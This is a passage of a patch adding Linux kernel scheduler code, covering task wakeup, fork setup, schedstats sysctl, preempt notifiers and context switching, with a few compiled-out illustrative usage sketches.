++	 * be possible to, falsely, observe p->on_rq == 0 and get stuck
++	 * in smp_cond_load_acquire() below.
++	 *
++	 * sched_ttwu_pending()			try_to_wake_up()
++	 *   STORE p->on_rq = 1			  LOAD p->state
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   UNLOCK rq->lock
++	 *
++	 * [task p]
++	 *   STORE p->state = UNINTERRUPTIBLE	  LOAD p->on_rq
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * A similar smp_rmb() lives in try_invoke_on_locked_down_task().
++	 */
++	smp_rmb();
++	if (READ_ONCE(p->on_rq) && ttwu_runnable(p, wake_flags))
++		goto unlock;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure we load p->on_cpu _after_ p->on_rq, otherwise it would be
++	 * possible to, falsely, observe p->on_cpu == 0.
++	 *
++	 * One must be running (->on_cpu == 1) in order to remove oneself
++	 * from the runqueue.
++	 *
++	 * __schedule() (switch to task 'p')	try_to_wake_up()
++	 *   STORE p->on_cpu = 1		  LOAD p->on_rq
++	 *   UNLOCK rq->lock
++	 *
++	 * __schedule() (put 'p' to sleep)
++	 *   LOCK rq->lock			  smp_rmb();
++	 *   smp_mb__after_spinlock();
++	 *   STORE p->on_rq = 0			  LOAD p->on_cpu
++	 *
++	 * Pairs with the LOCK+smp_mb__after_spinlock() on rq->lock in
++	 * __schedule().  See the comment for smp_mb__after_spinlock().
++	 *
++	 * Form a control-dep-acquire with p->on_rq == 0 above, to ensure
++	 * schedule()'s deactivate_task() has 'happened' and p will no longer
++	 * care about its own p->state. See the comment in __schedule().
++	 */
++	smp_acquire__after_ctrl_dep();
++
++	/*
++	 * We're doing the wakeup (@success == 1), they did a dequeue (p->on_rq
++	 * == 0), which means we need to do an enqueue, change p->state to
++	 * TASK_WAKING such that we can unlock p->pi_lock before doing the
++	 * enqueue, such as ttwu_queue_wakelist().
++	 */
++	WRITE_ONCE(p->__state, TASK_WAKING);
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, consider queueing p on the remote CPUs wake_list
++	 * which potentially sends an IPI instead of spinning on p->on_cpu to
++	 * let the waker make forward progress. This is safe because IRQs are
++	 * disabled and the IPI will deliver after on_cpu is cleared.
++	 *
++	 * Ensure we load task_cpu(p) after p->on_cpu:
++	 *
++	 * set_task_cpu(p, cpu);
++	 *   STORE p->cpu = @cpu
++	 * __schedule() (switch to task 'p')
++	 *   LOCK rq->lock
++	 *   smp_mb__after_spin_lock()          smp_cond_load_acquire(&p->on_cpu)
++	 *   STORE p->on_cpu = 1                LOAD p->cpu
++	 *
++	 * to ensure we observe the correct CPU on which the task is currently
++	 * scheduling.
++	 */
++	if (smp_load_acquire(&p->on_cpu) &&
++	    ttwu_queue_wakelist(p, task_cpu(p), wake_flags))
++		goto unlock;
++
++	/*
++	 * If the owning (remote) CPU is still in the middle of schedule() with
++	 * this task as prev, wait until it's done referencing the task.
++	 *
++	 * Pairs with the smp_store_release() in finish_task().
++	 *
++	 * This ensures that tasks getting woken will be fully ordered against
++	 * their previous state and preserve Program Order.
++	 */
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++	sched_task_ttwu(p);
++
++	cpu = select_task_rq(p);
++
++	if (cpu != task_cpu(p)) {
++		if (p->in_iowait) {
++			delayacct_blkio_end(p);
++			atomic_dec(&task_rq(p)->nr_iowait);
++		}
++
++		wake_flags |= WF_MIGRATED;
++		psi_ttwu_dequeue(p);
++		set_task_cpu(p, cpu);
++	}
++#else
++	cpu = task_cpu(p);
++#endif /* CONFIG_SMP */
++
++	ttwu_queue(p, cpu, wake_flags);
++unlock:
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++out:
++	if (success)
++		ttwu_stat(p, task_cpu(p), wake_flags);
++	preempt_enable();
++
++	return success;
++}
++
++static bool __task_needs_rq_lock(struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/*
++	 * Since pi->lock blocks try_to_wake_up(), we don't need rq->lock when
++	 * the task is blocked. Make sure to check @state since ttwu() can drop
++	 * locks at the end, see ttwu_queue_wakelist().
++	 */
++	if (state == TASK_RUNNING || state == TASK_WAKING)
++		return true;
++
++	/*
++	 * Ensure we load p->on_rq after p->__state, otherwise it would be
++	 * possible to, falsely, observe p->on_rq == 0.
++	 *
++	 * See try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	if (p->on_rq)
++		return true;
++
++#ifdef CONFIG_SMP
++	/*
++	 * Ensure the task has finished __schedule() and will not be referenced
++	 * anymore. Again, see try_to_wake_up() for a longer comment.
++	 */
++	smp_rmb();
++	smp_cond_load_acquire(&p->on_cpu, !VAL);
++#endif
++
++	return false;
++}
++
++/**
++ * task_call_func - Invoke a function on task in fixed state
++ * @p: Process for which the function is to be invoked, can be @current.
++ * @func: Function to invoke.
++ * @arg: Argument to function.
++ *
++ * Fix the task in its current state by avoiding wakeups and/or rq operations
++ * and call @func(@arg) on it.  This function can use ->on_rq and task_curr()
++ * to work out what the state is, if required.  Given that @func can be invoked
++ * with a runqueue lock held, it had better be quite lightweight.
++ *
++ * Returns:
++ *   Whatever @func returns
++ */
++int task_call_func(struct task_struct *p, task_call_f func, void *arg)
++{
++	struct rq *rq = NULL;
++	struct rq_flags rf;
++	int ret;
++
++	raw_spin_lock_irqsave(&p->pi_lock, rf.flags);
++
++	if (__task_needs_rq_lock(p))
++		rq = __task_rq_lock(p, &rf);
++
++	/*
++	 * At this point the task is pinned; either:
++	 *  - blocked and we're holding off wakeups      (pi->lock)
++	 *  - woken, and we're holding off enqueue       (rq->lock)
++	 *  - queued, and we're holding off schedule     (rq->lock)
++	 *  - running, and we're holding off de-schedule (rq->lock)
++	 *
++	 * The called function (@func) can use: task_curr(), p->on_rq and
++	 * p->__state to differentiate between these states.
++	 */
++	ret = func(p, arg);
++
++	if (rq)
++		__task_rq_unlock(rq, &rf);
++
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf.flags);
++	return ret;
++}
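++
++/*
++ * Illustrative sketch of a task_call_f callback (hypothetical, compiled
++ * out). Per the comment above it must stay lightweight, since it can run
++ * under the runqueue lock.
++ */
++#if 0
++static int example_read_cpu(struct task_struct *p, void *arg)
++{
++	*(int *)arg = task_cpu(p);	/* stable: @p is pinned here */
++	return 0;
++}
++
++static int example_task_cpu_stable(struct task_struct *p)
++{
++	int cpu;
++
++	task_call_func(p, example_read_cpu, &cpu);
++	return cpu;
++}
++#endif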
++
++/**
++ * cpu_curr_snapshot - Return a snapshot of the currently running task
++ * @cpu: The CPU on which to snapshot the task.
++ *
++ * Returns the task_struct pointer of the task "currently" running on
++ * the specified CPU.  If the same task is running on that CPU throughout,
++ * the return value will be a pointer to that task's task_struct structure.
++ * If the CPU did any context switches even vaguely concurrently with the
++ * execution of this function, the return value will be a pointer to the
++ * task_struct structure of a randomly chosen task that was running on
++ * that CPU somewhere around the time that this function was executing.
++ *
++ * If the specified CPU was offline, the return value is whatever it
++ * is, perhaps a pointer to the task_struct structure of that CPU's idle
++ * task, but there is no guarantee.  Callers wishing a useful return
++ * value must take some action to ensure that the specified CPU remains
++ * online throughout.
++ *
++ * This function executes full memory barriers before and after fetching
++ * the pointer, which permits the caller to confine this function's fetch
++ * with respect to the caller's accesses to other shared variables.
++ */
++struct task_struct *cpu_curr_snapshot(int cpu)
++{
++	struct task_struct *t;
++
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	t = rcu_dereference(cpu_curr(cpu));
++	smp_mb(); /* Pairing determined by caller's synchronization design. */
++	return t;
++}
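++
++/*
++ * Illustrative sketch (hypothetical, compiled out): per the comment
++ * above, a caller that wants a useful snapshot keeps the CPU online
++ * around the call, e.g. by holding the hotplug read lock.
++ */
++#if 0
++static struct task_struct *example_snapshot_curr(int cpu)
++{
++	struct task_struct *t;
++
++	cpus_read_lock();	/* keep @cpu from going offline */
++	t = cpu_curr_snapshot(cpu);
++	cpus_read_unlock();
++	return t;		/* only a snapshot; may be stale already */
++}
++#endif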
++
++/**
++ * wake_up_process - Wake up a specific process
++ * @p: The process to be woken up.
++ *
++ * Attempt to wake up the nominated process and move it to the set of runnable
++ * processes.
++ *
++ * Return: 1 if the process was woken up, 0 if it was already running.
++ *
++ * This function executes a full memory barrier before accessing the task state.
++ */
++int wake_up_process(struct task_struct *p)
++{
++	return try_to_wake_up(p, TASK_NORMAL, 0);
++}
++EXPORT_SYMBOL(wake_up_process);
++
++int wake_up_state(struct task_struct *p, unsigned int state)
++{
++	return try_to_wake_up(p, state, 0);
++}
++
++/*
++ * Perform scheduler related setup for a newly forked process p.
++ * p is forked by current.
++ *
++ * __sched_fork() is basic setup used by init_idle() too:
++ */
++static inline void __sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	p->on_rq			= 0;
++	p->on_cpu			= 0;
++	p->utime			= 0;
++	p->stime			= 0;
++	p->sched_time			= 0;
++
++#ifdef CONFIG_SCHEDSTATS
++	/* Even if schedstat is disabled, there should not be garbage */
++	memset(&p->stats, 0, sizeof(p->stats));
++#endif
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++	INIT_HLIST_HEAD(&p->preempt_notifiers);
++#endif
++
++#ifdef CONFIG_COMPACTION
++	p->capture_control = NULL;
++#endif
++#ifdef CONFIG_SMP
++	p->wake_entry.u_flags = CSD_TYPE_TTWU;
++#endif
++}
++
++/*
++ * fork()/clone()-time setup:
++ */
++int sched_fork(unsigned long clone_flags, struct task_struct *p)
++{
++	__sched_fork(clone_flags, p);
++	/*
++	 * We mark the process as NEW here. This guarantees that
++	 * nobody will actually run it, and a signal or other external
++	 * event cannot wake it up and insert it on the runqueue either.
++	 */
++	p->__state = TASK_NEW;
++
++	/*
++	 * Make sure we do not leak PI boosting priority to the child.
++	 */
++	p->prio = current->normal_prio;
++
++	/*
++	 * Revert to default priority/policy on fork if requested.
++	 */
++	if (unlikely(p->sched_reset_on_fork)) {
++		if (task_has_rt_policy(p)) {
++			p->policy = SCHED_NORMAL;
++			p->static_prio = NICE_TO_PRIO(0);
++			p->rt_priority = 0;
++		} else if (PRIO_TO_NICE(p->static_prio) < 0)
++			p->static_prio = NICE_TO_PRIO(0);
++
++		p->prio = p->normal_prio = p->static_prio;
++
++		/*
++		 * We don't need the reset flag anymore after the fork. It has
++		 * fulfilled its duty:
++		 */
++		p->sched_reset_on_fork = 0;
++	}
++
++#ifdef CONFIG_SCHED_INFO
++	if (unlikely(sched_info_on()))
++		memset(&p->sched_info, 0, sizeof(p->sched_info));
++#endif
++	init_task_preempt_count(p);
++
++	return 0;
++}
++
++void sched_cgroup_fork(struct task_struct *p, struct kernel_clone_args *kargs)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	/*
++	 * Because we're not yet on the pid-hash, p->pi_lock isn't strictly
++	 * required yet, but lockdep gets upset if rules are violated.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	/*
++	 * Share the timeslice between parent and child, so that the
++	 * total amount of pending timeslices in the system doesn't change,
++	 * resulting in more scheduling fairness.
++	 */
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	rq->curr->time_slice /= 2;
++	p->time_slice = rq->curr->time_slice;
++#ifdef CONFIG_SCHED_HRTICK
++	hrtick_start(rq, rq->curr->time_slice);
++#endif
++
++	if (p->time_slice < RESCHED_NS) {
++		p->time_slice = sched_timeslice_ns;
++		resched_curr(rq);
++	}
++	sched_task_fork(p, rq);
++	raw_spin_unlock(&rq->lock);
++
++	rseq_migrate(p);
++	/*
++	 * We're setting the CPU for the first time, we don't migrate,
++	 * so use __set_task_cpu().
++	 */
++	__set_task_cpu(p, smp_processor_id());
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++void sched_post_fork(struct task_struct *p)
++{
++}
++
++#ifdef CONFIG_SCHEDSTATS
++
++DEFINE_STATIC_KEY_FALSE(sched_schedstats);
++
++static void set_schedstats(bool enabled)
++{
++	if (enabled)
++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be run in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
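++
++/*
++ * Illustrative sketch of the splice/run pairing above (hypothetical,
++ * compiled out): callers that must drop rq->lock before running the
++ * callbacks detach the list under the lock, then run it lock-free.
++ */
++#if 0
++static void example_run_balance_callbacks(struct rq *rq)
++{
++	struct balance_callback *head;
++
++	raw_spin_lock(&rq->lock);
++	head = splice_balance_callbacks(rq);	/* detach under rq->lock */
++	raw_spin_unlock(&rq->lock);
++
++	balance_callbacks(rq, head);		/* re-takes rq->lock if needed */
++}
++#endif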
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * The runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch has flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could race with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing through
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible for using it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
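++
++/*
++ * Illustrative polling-loop use, per the caution above (a sketch, not
++ * taken from a real caller):
++ *
++ *	while (single_task_running() && !need_resched())
++ *		cpu_relax();
++ */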
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
